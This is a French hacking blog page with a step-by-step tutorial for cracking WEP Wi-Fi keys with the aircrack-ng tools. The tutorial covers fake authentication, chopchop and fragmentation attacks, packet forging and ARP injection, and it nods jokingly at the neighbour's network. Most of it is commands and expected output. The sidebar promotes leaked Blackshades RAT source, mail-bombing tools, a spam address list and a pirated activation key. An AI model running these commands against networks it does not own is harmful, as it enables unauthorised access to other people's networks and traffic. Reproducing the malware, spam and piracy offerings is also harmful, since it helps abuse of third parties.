Post Populaire

  • Source Blackshades RAT
    Source Blackshades RAT Le code source de Blackshades Fusion RAT a fuité sur le net et se retrouve en téléchargement libre. Ce RAT de ty...
  • Géo-localiser vos Contacts
    Géo-localiser vos Contacts Aujourd’hui nous allons voir comment géolocaliser les adresses d’une liste de contacts et les projeter sur un...
  • Meziamus.com ou le forum de l'arnaque !
    Nous savions tous déjà que ce forum administrer par Méziane Allali dit "Méziamus" n'a été créer que dans un seul but, pi...
  • Temps de chargement de votre blog
    Visualiser le temps de chargement de votre blog - Pingdom Tools Google prend en compte le temps de chargement de votre site web comme gage...
  • Tuto jbonblanc
    Jbonblanc c'est quoi ? C'est un logiciel qui vous permet d'envoyer des mails par un serveur smtp. Un serveur smtp c'est ...
  • Cracker mot de passe pour macro VBA Excel
    Comment ouvrir une macro VBA Excel protegee par un mot de passe Sebdelkil vous présenter un petit "tuto" de "dessous les fag...
  • Clé d'activation TuneUp Utilities 2014
    Clé d'activation TuneUp Utilities 2014 Ce logiciel est reconnu meilleur logiciel de l'année 2013 a titre d'optimisation...
  • Mail-bombing
    Voici une petite collection de bomber sélectionner par SEBDELKIL,  certain sont vieux d'autres pas très efficace, d'autres très bo...
  • Listing d'adresse mail
    Listing d'adresse mail Voila un type de listing de 10 000 adresse mail, j'ai dégoter cette mail-liste employer par des spam...

Cracke Wep





Cracke Wep

Sebdelkil vous  présente un tuto créer par  "staarz", plutôt bien fait,  je me permet donc de vous le présenté Il explique comment tester ca clef Wep, hé non cracker la clef Wep du voisin ;-)


--------| Prérequis |--------

Pour pouvoir réussir sans difficultés ce tuto vous devriez quand même avoir la base, c'est à dire arriver à cracker une clé Wep normale.
Savoir si votre carte-wifi supporte l'injection.
Utilisation des commandes : airmon-ng | airodump-ng | aireplay-ng | packetforge-ng | aircrack-ng

--------| TUTO |--------

1) On fait la commande : "airmon-ng" puis "airmon-ng start [INTERFACE]" dans mon cas ce sera :
airmon-ng start wlan0


2) Là on va accélérer un peu car vous devriez savoir les commandes qui suivent :
airodump-ng --encrypt wep mon0          //On précise qu_on veut cibler notre scan sur des réseaux d_enc WEP, et on indique l_interface : mon0 !

On note l_ESSID, le BSSID et le CH ( le nom du réseau, l'adresse mac du celui-ci, et son channel) du réseau choisi

/!\ ATTENTION : Ne pas essayer de séléctionner un réseau trop éloigné, car la connexion peut être facilement perdue. /!\
airodump-ng --wright CrackWifi --channel [channel_du_code_d_en_haut] --bssid [bssid_du_code_d_en_haut]          //Le tout sans les [_] bien-sûr...

Explications : --wright va créer un fichier CrackWifi où seront stockées toutes les données sniffées, Et vous gardez cette konsole ouverte, vous en ouvrez une nouvelle et...

Et on va passer à la commande aireplay-ng avec la fonction 1, c'est à dire FakeAuth
aireplay-ng -1 30 -e [ESSID] -a [BSSID] -h 00:12:F0:6F:ED:38 mon0

Explications : -1 correspond à la FakeAuth, 30 c'est l'intervalle en secondes de la réassociation au point d'accès, ESSID c'est le nom du réseau, -a l'adresse BSSID du réseau et -h vous pouvez y mettre n'importe quoi tant que le filtrage mac n'est pas activé, biensûr il faut que cela a à peu près la même forme, du genre XX:XX:XX:XX:XX:XX

Le résultat de la commande devrait se présenter sous cette forme là à peu près :
Sending Authenticating Request (OPEN SYSTEM) [ACK]
Authenticating successfulSending Association Request [ACK]
Association successful :-) (AID: 1)
Sending Keep-Alive packet [ACK]


3) Place au Chopchop
Maintenant, vous devriez voir dans la fenêtre airodump-ng une machine de connecté, avec l'adresse MAC que vous avez saisi un peu plus haut !
Continuons :
aireplay-ng -4 -a BSSID -h 00:12:F0:6F:ED:38 mon0

Explications : -4, correspond à l'attaque chopchop d'aireplay, -a et -h toujours les mêmes comme cité plus haut, et puis l'interface comme d'hab.
Une fois la commande validée, on vous demandera si vous souhaitez utiliser les packets obtenus, appuyez sur Y.
Si la ligne de commande vous retourne le message 'Completed in', cela voudra dire que l'attaque est réussie.(vous devriez avoir le message après ± 20secs à partir de la commande lancée).

Maintenant on va utiliser la commande aireplay-ng, mais cette fois ci avec l'attaque -5 c'est l'attaque par fragmentation, on rentre la même commande sauf en changeant -4 en -5 donc :
aireplay-ng -5 -a BSSID -h 00:12:F0:6F:ED:38 mon0

Pas d'explications cette fois-ci, mais là aussi vous aurez le choix d'utiliser les packets capturées ou pas, donc faites Y.
Quand vous voyez que la ligne de commande vous retourne la ligne "Saving keystream in fragment-xxxx-xxxxxx.xor", et que vous pouvez controler la frappe sur la console, cela veut dire que cette attaque-là est réussie avec succès.

Pour la suite on va utiliser le fichier .xor crée précedemment par la commande aireplay-ng -5...
On tape :
packetforge-ng -0 -a [BSSID] -h 00:12:F0:6F:ED:38 -k [ip_de_destination] -l [ip_source] -y .xor -w arp.cap

Explications : -y correspond à notre fichier .xor juste crée précedemment, et -w veut dire que le packet sera crée, donc arp.cap sera crée.

4) L'injection aireplay !
On y go :
aireplay-ng -3 -e [ESSID] -a [BSSID] -h 00:12:F0:6F:ED:38 -x600 -r arp.cap mon0

Explications : -x600 nombre de packets injectés par seconde, -r on va injecter du contenu dans arp.cam, et toujours l'interface mon0 !

Sur la fenêtre d'airodump-ng vous devez voir les #DATA's augmenter 
Ensuite il vous suffit d'attendre un certain temps, le temps d'avoir assez de #DATA's pour pouvoir cracker la clé !

Et le but FINAL :
aircrack-ng CrackWifi.cap

DATA's pour que l'attaque s'achève avec succès !


Rechercher dans ce blog

Nombre d'articles

Hé bein ... déjà 871 articles publiés sur le site sebdelkil...

Fouiller dedans...

Un Nuage en Flash par Le Blogger

Formulaire de contact

Nom

E-mail *

Message *

/* Contains the "Load More Posts" functionality */ jQuery( document ).ready( function( $ ) { var next_page = parseInt( ronalfy_load_more.current_page ) + 1; var max_pages = parseInt( ronalfy_load_more.max_pages ); if ( next_page <= max_pages ) { $navi = $( '#content .paging-navigation' ); $navi .html( '
' +'' ); } else{ console.log(next_page+';'+max_pages) } var mt_ajax_load_posts = function() { //Begin Ajax data = { action: 'load_posts', next_page: next_page }; if( typeof $globalcat != 'undefined' ){ data.cat = $globalcat; } $.post( ronalfy_load_more.ajaxurl, data, function( response ) { next_page = response.next_page; max_pages = response.max_pages; //Append the HTML var html = $.parseHTML( response.html ); //html = $( html ).filter( '.type-post' ); //console.log('dodajemo gore'); $('#content section.post-item:last').after(html); //If the next page exceeds the number of pages available, get rid of the navigation if ( next_page > max_pages ) { $( '.paging-navigation' ).html( '' ); } //Fade out loading img and fade in loading text $( '.load_more' ).html('Load More'); }, 'json' ); }; //Clicking the load more button $( '.paging-navigation' ).on( 'click', '.load_more', function( e ) { e.preventDefault(); $( '.load_more' ).html('Loading...'); mt_ajax_load_posts(); } ); } );

- sebdelkil 2009-2015 - Aucun droit réservé -